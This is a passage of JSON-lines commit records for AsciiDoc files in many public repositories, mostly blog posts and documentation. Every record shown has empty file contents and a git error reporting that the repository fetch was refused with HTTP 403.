'https:\/\/github.com\/pjanouch\/sdn.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"f079075f4b25ef00c660ac4bce7d116e27b48856","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"d8a78b5e5e274fbe4f2ba92c2fa6214d849efa35","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cdf3e008b0a7481f6f5f1503e1e509b3e5a7494","subject":"y2b create post I Bet Your Headphones Can't Do This...","message":"y2b create post I Bet Your Headphones Can't Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-17-I-Bet-Your-Headphones-Cant-Do-This.adoc","new_file":"_posts\/2017-05-17-I-Bet-Your-Headphones-Cant-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fe960f738db1627b09aa42224f8c0e77aa6da56","subject":"Some research.","message":"Some research.\n","repos":"bakketun\/unicode-for-common-lisp","old_file":"research.adoc","new_file":"research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bakketun\/unicode-for-common-lisp.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17681454866a21456cee09a7d9072de4bca533f4","subject":"y2b create post iPad 5 Space Gray Leaked? (First Look + Comparison)","message":"y2b create post iPad 5 Space Gray Leaked? (First Look + Comparison)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-01-iPad-5-Space-Gray-Leaked-First-Look--Comparison.adoc","new_file":"_posts\/2013-10-01-iPad-5-Space-Gray-Leaked-First-Look--Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"597dc45b3e6c734e01fe83c09b1e438494044ba2","subject":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","message":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75b0c460f677329bcdc63349b393d2c893e15cba","subject":"Update 2018-07-19-Keeping-a-blockchain-decentralised.adoc","message":"Update 2018-07-19-Keeping-a-blockchain-decentralised.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-19-Keeping-a-blockchain-decentralised.adoc","new_file":"_posts\/2018-07-19-Keeping-a-blockchain-decentralised.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ab9dc098200627f1bda0baa60b58bcba7905199","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5175466ae749fead1c2c0e3eaec04459d828a4c4","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b217f4078d00c3acb5e7a8c49f663f2604f02567","subject":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc'","message":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc'","repos":"kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io","old_file":"_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc","new_file":"_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kwpale\/kwpale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"391e4aa056aa860a27d386eb1e761ea8126de339","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0f937882da3679c557ce293e59f739a6e17e77f","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f23fc269dd9067a97e9e6874ed3087a2d9813f","subject":"Create atom_packages.adoc","message":"Create atom_packages.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"atom_packages.adoc","new_file":"atom_packages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"c4368c15c14f8097e2045f283ea3af917b79ef8f","subject":"Include rest client multipart guide","message":"Include rest client multipart guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/rest-client-multipart-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/rest-client-multipart-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c2fb59e0dfa2ca1869cfea91759688d808ff6b1","subject":"Update 2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","message":"Update 2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","new_file":"_posts\/2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b75a1b18102b0b298dcb2a1da88bad5717cd3068","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4115787dff0020e08eabc5c4fcb3410f3df71e","subject":"Update 2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","message":"Update 2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","new_file":"_posts\/2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80e6dbdc632e0998a5edbc1bfdf8a062866cde70","subject":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","message":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","new_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e07e3fda38838bf85b52da7d75015a1ab3b3d9f1","subject":"Announcing hawkular-services 0.32 (#277)","message":"Announcing hawkular-services 0.32 (#277)\n\n","repos":"pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/02\/15\/hawkular-services-0.32-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/02\/15\/hawkular-services-0.32-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df7beb42385f45d1d39f76ee4b9775496915b6ea","subject":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","message":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c243838e38e2e1b08a95a3a570d550fc7123de5","subject":"Renamed '_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","message":"Renamed '_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_file":"_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"309d868953db8d1646b8d60646f4a867568b77e8","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fd2eadc1711c76567846af41ee5d30d8b660def","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4de1a33973aa940ff59f79ceaa29283aac15ccd1","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f22da91a963e1de619f8e65570437fdf20ed12e6","subject":"Update 2015-11-04-Google-Big-Table.adoc","message":"Update 2015-11-04-Google-Big-Table.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-04-Google-Big-Table.adoc","new_file":"_posts\/2015-11-04-Google-Big-Table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39bb565d9dac250d43103bc1e468588f44690919","subject":"Update 2016-07-21-Curriculum-Vitae.adoc","message":"Update 2016-07-21-Curriculum-Vitae.adoc","repos":"warpcoil\/warpcoil.github.io,warpcoil\/warpcoil.github.io,warpcoil\/warpcoil.github.io,warpcoil\/warpcoil.github.io","old_file":"_posts\/2016-07-21-Curriculum-Vitae.adoc","new_file":"_posts\/2016-07-21-Curriculum-Vitae.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/warpcoil\/warpcoil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc3a059e57b871fb1c5ad8e250a9c609e97bbbff","subject":"Update 2017-02-24-Ghrome-Extension.adoc","message":"Update 2017-02-24-Ghrome-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Ghrome-Extension.adoc","new_file":"_posts\/2017-02-24-Ghrome-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30d12c2d606bc354d7bd2dcd590ab9a8ef7d7114","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c9f98b4bd68e9f96152fcac98a02469af3f0e0b","subject":"y2b create post Panasonic RP-HTX7 Headphones Unboxing","message":"y2b create post Panasonic RP-HTX7 Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-20-Panasonic-RPHTX7-Headphones-Unboxing.adoc","new_file":"_posts\/2011-07-20-Panasonic-RPHTX7-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdcc09c54661431d04ab13d289621f3f0dff7387","subject":"warning dependency not Buildscript depenency","message":"warning dependency not Buildscript depenency\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-warningDependencyNotBuildscriptDependency.adoc","new_file":"src\/main\/docs\/common-warningDependencyNotBuildscriptDependency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6cea889c1b4b9f5d265916338fd248f49554e245","subject":"Update 2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","message":"Update 2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","new_file":"_posts\/2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abb34da860f4950b4938b51dd851362c83945510","subject":"Update 2016-11-08-092300-Tuesday-Morning.adoc","message":"Update 2016-11-08-092300-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-092300-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-08-092300-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4769056559533ffafc41ac3ed8fcbb019f04c337","subject":"Update 2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","message":"Update 2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","new_file":"_posts\/2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a31c1f61c8de5e88d8d6ddb8c210ff6f09f7faa","subject":"Update 2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","message":"Update 2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","new_file":"_posts\/2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a84fd3cc5c3de84fe4a929a7d06b65158ce49de6","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18ba1c49ccc48493113967ebe71795453fc53e8e","subject":"Update 2016-05-22-Gotcha-with-fitness-function-design.adoc","message":"Update 2016-05-22-Gotcha-with-fitness-function-design.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Gotcha-with-fitness-function-design.adoc","new_file":"_posts\/2016-05-22-Gotcha-with-fitness-function-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b9c96bfd2f802e476991bb66fe64354b4130b47","subject":"docs: start some real design documentation","message":"docs: start some real design documentation\n","repos":"larshp\/abaplint,larshp\/abaplint,larshp\/abapOpenChecksJS,larshp\/abapOpenChecksJS,larshp\/abapOpenChecksJS,larshp\/abaplint,larshp\/abaplint","old_file":"docs\/design\/index.adoc","new_file":"docs\/design\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larshp\/abapOpenChecksJS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a2e5f42b8f70bf49c6a094d9cc8737b811776c","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89ffc9ed4afdc08b8079848fb92aeef56ac63f84","subject":"y2b create post Nexus 7 vs iPad Mini Showdown! (New Nexus 7 2013)","message":"y2b create post Nexus 7 vs iPad Mini Showdown! (New Nexus 7 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-09-Nexus-7-vs-iPad-Mini-Showdown-New-Nexus-7-2013.adoc","new_file":"_posts\/2013-08-09-Nexus-7-vs-iPad-Mini-Showdown-New-Nexus-7-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9639dd4ccec9f507a3db0b4c8f1396533a7f0f42","subject":"Worked on AMCache documentation","message":"Worked on AMCache documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41605cfc6fc239751d16cf9c416c7bbdbef0442d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c85c14f5089ec58ae15cf7e481bd2843c579f92","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ea4aebd74d4fd4d82543d914879f5c21853358","subject":"Update 2015-03-15-NEW-J5-Breakout-Board.adoc","message":"Update 